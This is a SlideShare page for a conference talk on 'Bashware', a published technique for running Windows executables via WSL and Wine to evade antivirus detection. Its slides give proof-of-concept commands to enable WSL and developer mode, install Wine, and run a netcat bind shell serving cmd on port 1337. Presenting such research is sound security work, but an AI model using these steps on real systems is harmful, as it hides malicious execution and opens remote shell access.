Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
Bashware
A malware execution technique
/usr/bin/who
• null and OWASP Bangalore chapter leader
• A decade of security experience in various technologies
• Securit...
What is Bashware?
• A technique researched by Check Point Security that can be used by
malware to run using the Windows Su...
Back to Basics
• How does malware (pick any) infect a Windows machine?
• How is it detected? Any examples of detection tec...
An overview of WSL
• WSL is a collection of components that enables native Linux ELF64
binaries to run on Windows. It cont...
Demo of WSL
Bashware Video Demo
• https://www.youtube.com/watch?v=fwEQFMbHIV8
Let’s build a PoC!
According to the video/blogpost
• Enable WSL
• Enable Developer mode
• Install Linux components
• Install WineHQ
• Run Win...
Step 1: Enable WSL
dism /Online /Enable-Feature /All /FeatureName:Microsoft-
Windows-Subsystem-Linux /NoRestart
Enable-Win...
Step 2: Enable Developer mode
• Set the following registry values
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersio...
Step 3: Install Linux components
• lxrun /install /y
Step 4: Install Wine
dpkg --add-architecture i386
add-apt-repository -y ppa:ubuntu-wine/ppa
apt-get update
apt-get install...
Step 5: Run PE binary using wine
wine64 nc64.exe -lvp 1337 -e cmd
Demo
• Riyaz Walikar
• https://ibreak.software
• @riyazwalikar | @wincmdfu
References
• https://research.checkpoint.com/beware-bashware-new-method-
malware-bypass-security-solutions/
• https://www....
Executing Windows Malware through WSL (Bashware)
Upcoming SlideShare
Loading in …5
×

Executing Windows Malware through WSL (Bashware)

399 views

Published on

A quick talk on executing Windows binaries using Wine in WSL. This allows for a sort of hidden process execution.

Published in: Software
  • Be the first to comment

  • Be the first to like this

Executing Windows Malware through WSL (Bashware)

  1. 1. Bashware A malware execution technique
  2. 2. /usr/bin/who • null and OWASP Bangalore chapter leader • A decade of security experience in various technologies • Security researcher and evangelist • Speaker and trainer at several security conferences • https://ibreak.software • @riyazwalikar | @wincmdfu
  3. 3. What is Bashware? • A technique researched by Check Point Security that can be used by malware to run using the Windows Subsystem for Linux (WSL) and not be detected by security solutions (like AV etc.) • Basically a way to run PE executables using the WSL • Bash + (mal)ware
  4. 4. Back to Basics • How does malware (pick any) infect a Windows machine? • How is it detected? Any examples of detection techniques?
  5. 5. An overview of WSL • WSL is a collection of components that enables native Linux ELF64 binaries to run on Windows. It contains both user mode and kernel mode components. It is primarily comprised of: • User mode session manager service that handles the Linux instance life cycle • Pico provider drivers (lxss.sys, lxcore.sys) that emulate a Linux kernel by translating Linux syscalls • Pico processes that host the unmodified user mode Linux (e.g. /bin/bash)
  6. 6. Demo of WSL
  7. 7. Bashware Video Demo • https://www.youtube.com/watch?v=fwEQFMbHIV8
  8. 8. Let’s build a PoC!
  9. 9. According to the video/blogpost • Enable WSL • Enable Developer mode • Install Linux components • Install WineHQ • Run Windows binary through Wine
  10. 10. Step 1: Enable WSL dism /Online /Enable-Feature /All /FeatureName:Microsoft- Windows-Subsystem-Linux /NoRestart Enable-WindowsOptionalFeature -O -F Microsoft-Windows- Subsystem-Linux
  11. 11. Step 2: Enable Developer mode • Set the following registry values [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionAppModelUnlock] "AllowAllTrustedApps"=dword:1 "AllowDevelopmentWithoutDevLicense"=dword:1
  12. 12. Step 3: Install Linux components • lxrun /install /y
  13. 13. Step 4: Install Wine dpkg --add-architecture i386 add-apt-repository -y ppa:ubuntu-wine/ppa apt-get update apt-get install wine1.6-amd64
  14. 14. Step 5: Run PE binary using wine wine64 nc64.exe -lvp 1337 -e cmd
  15. 15. Demo
  16. 16. • Riyaz Walikar • https://ibreak.software • @riyazwalikar | @wincmdfu
  17. 17. References • https://research.checkpoint.com/beware-bashware-new-method- malware-bypass-security-solutions/ • https://www.youtube.com/watch?v=fwEQFMbHIV8 • https://blogs.msdn.microsoft.com/wsl/2016/04/22/windows- subsystem-for-linux-overview/ • https://ibreak.software/executing-windows-malware-in-windows- subsystem-for-linux-bashware/

×